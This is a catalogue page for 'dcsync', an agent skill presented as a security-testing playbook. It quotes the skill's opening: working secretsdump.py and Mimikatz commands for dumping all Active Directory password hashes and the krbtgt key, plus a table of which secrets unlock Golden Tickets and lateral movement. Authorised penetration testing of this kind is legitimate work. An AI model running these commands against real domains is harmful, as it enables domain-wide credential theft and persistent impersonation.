dcsync

dcsync is a skill for Claude Code, Codex from MingyiSecLab/Mingyi-Atlas. It costs 35 tokens per session (1,380 once invoked), scanned A, a copy of dcsync, Apache-2.0.

A playbook for DCSync, an Active Directory replication feature that can expose password hashes when excessive replication rights are misconfigured.

In plain words
What is it for?
It covers locating replication-rights holders, requesting account or krbtgt hashes, and saving results for offline password analysis.
Why use it?
It helps security testers find accounts with these rights and assess whether a misconfiguration could expose domain credentials.

Skill for Claude CodeCodex

Written for no agent in particular: nothing here depends on one.

Good fit It covers locating replication-rights holders, requesting account or krbtgt hashes, and saving results for offline password analysis.

Compare 6 skills from other repositories ↓
Install with agentmods
npx agentmods add skills/mingyiseclab/mingyi-atlas/dcsync
Install

Getting it into your agent

One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.

Any agent
npx skills add MingyiSecLab/Mingyi-Atlas --skill dcsync
Clone the repo
git clone --depth 1 https://github.com/MingyiSecLab/Mingyi-Atlas

Made for: Claude Code, Codex.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for dcsync

README.md
[![agentmods](https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/dcsync.svg)](https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/dcsync)
Your own site
<a href="https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/dcsync"><img src="https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/dcsync.svg" alt="Measured on agentmods" height="20"></a>
Per session 35 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 1,380 The whole file, excluding the scripts and references it only reads on demand.
Security scan A 0 findings. A grade says what 26 rules found in the file — not that it is safe.
Origin 94% copy Near-identical to another mod in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00035 $0.01380
Opus 5 $0.00017 $0.00690
Sonnet 5 $0.00007 $0.00276
Haiku 4.5 $0.00003 $0.00138

Measured 8d ago against content hash 3acfaf5abd7b, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-08, from the pricing page.

Security

Grade A, and why

dcsync scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 8d ago.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Nothing flagged

None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.

Origin

This is a copy

94% identical to dcsync — 2 lines differ, which has more behind it and is treated as the original. This page carries a canonical link to it rather than competing with it.

src/skills/standard/ad/dcsync/SKILL.md · 132 lines

How it starts

The opening of the file, as written. The whole thing — 132 lines — stays where its author put it; the contents beside it link to each section on GitHub.

DCSync Playbook

DCSync is not a vulnerability — it's a legitimate AD feature for domain controllers to replicate. The "vulnerability" is when a non-DC principal has the replication-rights ACL.

1. Identify DCSync candidates

From BloodHound:

kg_query(kind="user", filter="dcsync=true") +
kg_query(kind="group", filter="dcsync=true")

Or Cypher direct:

MATCH (n)-[:GetChanges|GetChangesAll]->(:Domain)
RETURN DISTINCT n.name, labels(n)

Common holders (legitimate):

  • Domain Admins, Enterprise Admins, Domain Controllers
  • Exchange Trusted Subsystem (Exchange installs grant by default — historical PrivExchange)
  • Replicator (rare)

Common holders (misconfig = jackpot):

  • Service accounts (admins delegated mistakenly)
  • Helpdesk groups
  • Groups from old migrations

2. Execute DCSync

Impacket (most reliable):

# All NT hashes including krbtgt
secretsdump.py 'DOM/USER:PASS@DC_IP' -just-dc \
  -outputfile /tmp/secrets

# Just one target user
secretsdump.py 'DOM/USER:PASS@DC_IP' -just-dc-user 'krbtgt'

# With NT hash auth instead of password
secretsdump.py -hashes :NT_HASH 'DOM/USER@DC_IP' -just-dc

# With Kerberos ticket (cleaner OPSEC)
export KRB5CCNAME=/tmp/user.ccache
secretsdump.py -k -no-pass 'DOM/USER@DC_FQDN' -just-dc

Mimikatz (from Windows):

lsadump::dcsync /domain:dom.local /user:krbtgt
lsadump::dcsync /domain:dom.local /all /csv

3. Output files

secretsdump produces:

  • /tmp/secrets.ntdsuser:RID:LM_HASH:NT_HASH::: format
  • /tmp/secrets.ntds.kerberos — Kerberos keys (aes256, aes128, des)
  • /tmp/secrets.ntds.cleartext — any reversibly-encrypted passwords (rare, but yes)

4. Highest-value secrets to grab

User Why What unlocks
krbtgt Master Kerberos key Golden Ticket — persistence + arbitrary user impersonation forever (until rotation)
Administrator Built-in domain admin Direct admin on most assets
Domain Admin members Lateral movement Most assets
<trustname>$ Trust accounts Cross-forest movement
Service accounts Often local admin on hosts Lateral movement
Exchange computer accounts Mailbox access E-discovery / pivot

Read the full file on GitHub · 132 lines

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 8d ago First seen · 132 lines · 35 tokens per session scan A 3acfaf5abd7b

Subscribe to this mod's changes

dcsync is a skill published in the GitHub repository MingyiSecLab/Mingyi-Atlas (11 stars, last pushed 2mo ago), licensed Apache-2.0. It adds 35 tokens to every session and 1,380 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it A with 0 findings. It is 94% identical to dcsync, differing in 2 lines, and is treated as a copy.